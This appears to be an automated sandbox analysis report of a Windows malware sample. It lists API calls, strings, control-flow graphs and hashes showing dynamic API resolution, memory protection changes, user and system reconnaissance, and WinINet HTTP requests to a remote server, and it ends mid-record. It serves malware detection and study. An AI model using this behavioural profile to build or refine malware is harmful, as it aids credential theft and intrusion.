22d3823 8 API calls 27777 22d30d0 9 API calls

                                          Control-flow Graph

                                          APIs
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
                                          • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
                                          • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
                                          • strlen.MSVCRT ref: 004046F0
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
                                          • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C
                                          Strings
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                          • API String ID: 2127927946-2218711628
                                          • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                          • Instruction ID: ff82eb6acc97b20701c4bcbd3dbf8f3289274c2dbbe7f73b68b52ee208cac3fc
                                          • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                          • Instruction Fuzzy Hash: 1D419979740624EBC718AFE5FC8DB987F71AB4C712BA0C062F90296190C7B9D5119B3E

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 752 419860-419874 call 419750 755 419a93-419af2 LoadLibraryA * 5 752->755 756 41987a-419a8e call 419780 GetProcAddress * 21 752->756 758 419af4-419b08 GetProcAddress 755->758 759 419b0d-419b14 755->759 756->755 758->759 761 419b46-419b4d 759->761 762 419b16-419b41 GetProcAddress * 2 759->762 763 419b68-419b6f 761->763 764 419b4f-419b63 GetProcAddress 761->764 762->761 765 419b71-419b84 GetProcAddress 763->765 766 419b89-419b90 763->766 764->763 765->766 767 419bc1-419bc2 766->767 768 419b92-419bbc GetProcAddress * 2 766->768 768->767
                                          APIs
                                          • GetProcAddress.KERNEL32(75900000,00767E58), ref: 004198A1
                                          • GetProcAddress.KERNEL32(75900000,00767F18), ref: 004198BA
                                          • GetProcAddress.KERNEL32(75900000,00767E88), ref: 004198D2
                                          • GetProcAddress.KERNEL32(75900000,00767ED0), ref: 004198EA
                                          • GetProcAddress.KERNEL32(75900000,00767EA0), ref: 00419903
                                          • GetProcAddress.KERNEL32(75900000,00764E20), ref: 0041991B
                                          • GetProcAddress.KERNEL32(75900000,007648E8), ref: 00419933
                                          • GetProcAddress.KERNEL32(75900000,00764928), ref: 0041994C
                                          • GetProcAddress.KERNEL32(75900000,00767EE8), ref: 00419964
                                          • GetProcAddress.KERNEL32(75900000,00767E70), ref: 0041997C
                                          • GetProcAddress.KERNEL32(75900000,00792B48), ref: 00419995
                                          • GetProcAddress.KERNEL32(75900000,00792C68), ref: 004199AD
                                          • GetProcAddress.KERNEL32(75900000,00764A28), ref: 004199C5
                                          • GetProcAddress.KERNEL32(75900000,00792B90), ref: 004199DE
                                          • GetProcAddress.KERNEL32(75900000,00792BA8), ref: 004199F6
                                          • GetProcAddress.KERNEL32(75900000,007647E8), ref: 00419A0E
                                          • GetProcAddress.KERNEL32(75900000,00792C20), ref: 00419A27
                                          • GetProcAddress.KERNEL32(75900000,00792C50), ref: 00419A3F
                                          • GetProcAddress.KERNEL32(75900000,00764A08), ref: 00419A57
                                          • GetProcAddress.KERNEL32(75900000,00792C38), ref: 00419A70
                                          • GetProcAddress.KERNEL32(75900000,00764748), ref: 00419A88
                                          • LoadLibraryA.KERNEL32(00792AA0,?,00416A00), ref: 00419A9A
                                          • LoadLibraryA.KERNEL32(00792C80,?,00416A00), ref: 00419AAB
                                          • LoadLibraryA.KERNEL32(00792C98,?,00416A00), ref: 00419ABD
                                          • LoadLibraryA.KERNEL32(00792B00,?,00416A00), ref: 00419ACF
                                          • LoadLibraryA.KERNEL32(00792AE8,?,00416A00), ref: 00419AE0
                                          • GetProcAddress.KERNEL32(75070000,00792CB0), ref: 00419B02
                                          • GetProcAddress.KERNEL32(75FD0000,00792A58), ref: 00419B23
                                          • GetProcAddress.KERNEL32(75FD0000,007929C8), ref: 00419B3B
                                          • GetProcAddress.KERNEL32(75A50000,00792B18), ref: 00419B5D
                                          • GetProcAddress.KERNEL32(74E50000,00764708), ref: 00419B7E
                                          • GetProcAddress.KERNEL32(76E80000,00764F60), ref: 00419B9F
                                          • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00419BB6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad
                                          • String ID: ,y$ Nv$(Iv$(Jv$8,y$H+y$HGv$NtQueryInformationProcess$P,y$X*y$X~v$`Ov$h,y$p~v$*y$Gv$Hv$~v
                                          • API String ID: 2238633743-1813011027
                                          • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                          • Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
                                          • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                          • Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 769 404880-404942 call 41a7a0 call 4047b0 call 41a740 * 5 InternetOpenA StrCmpCA 784 404944 769->784 785 40494b-40494f 769->785 784->785 786 404955-404acd call 418b60 call 41a920 call 41a8a0 call 41a800 * 2 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a920 call 41a8a0 call 41a800 * 2 InternetConnectA 785->786 787 404ecb-404ef3 InternetCloseHandle call 41aad0 call 409ac0 785->787 786->787 873 404ad3-404ad7 786->873 797 404f32-404fa2 call 418990 * 2 call 41a7a0 call 41a800 * 8 787->797 798 404ef5-404f2d call 41a820 call 41a9b0 call 41a8a0 call 41a800 787->798 798->797 874 404ae5 873->874 875 404ad9-404ae3 873->875 876 404aef-404b22 HttpOpenRequestA 874->876 875->876 877 404b28-404e28 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a740 call 41a920 * 2 call 41a8a0 call 41a800 * 2 call 41aad0 lstrlenA call 41aad0 * 2 lstrlenA call 41aad0 HttpSendRequestA 876->877 878 404ebe-404ec5 InternetCloseHandle 876->878 989 404e32-404e5c InternetReadFile 877->989 878->787 990 404e67-404eb9 InternetCloseHandle call 41a800 989->990 991 404e5e-404e65 989->991 990->878 991->990 993 404e69-404ea7 call 41a9b0 call 41a8a0 call 41a800 991->993 993->989
                                          APIs
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                            • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                            • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                            • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                            • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404915
                                          • StrCmpCA.SHLWAPI(?,0079B138), ref: 0040493A
                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404ABA
                                          • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,",00000000,?,0079B148), ref: 00404DE8
                                          • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E04
                                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E18
                                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E49
                                          • InternetCloseHandle.WININET(00000000), ref: 00404EAD
                                          • InternetCloseHandle.WININET(00000000), ref: 00404EC5
                                          • HttpOpenRequestA.WININET(00000000,0079B248,?,0079ABA0,00000000,00000000,00400100,00000000), ref: 00404B15
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                          • InternetCloseHandle.WININET(00000000), ref: 00404ECF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                          • String ID: "$"$------$------$------$HJy
                                          • API String ID: 2402878923-2052426667
                                          • Opcode ID: 2fa3b394260d3a3ce02c259ddf44f2a63f4c64190c2de6d978015daa5b68762b
                                          • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                                          • Opcode Fuzzy Hash: 2fa3b394260d3a3ce02c259ddf44f2a63f4c64190c2de6d978015daa5b68762b
                                          • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                          • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                          • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocNameProcessUser
                                          • String ID:
                                          • API String ID: 1206570057-0
                                          • Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                          • Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
                                          • Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                          • Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2
                                          APIs
                                          • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                          • ExitProcess.KERNEL32 ref: 0040117E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitInfoProcessSystem
                                          • String ID:
                                          • API String ID: 752954902-0
                                          • Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                          • Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
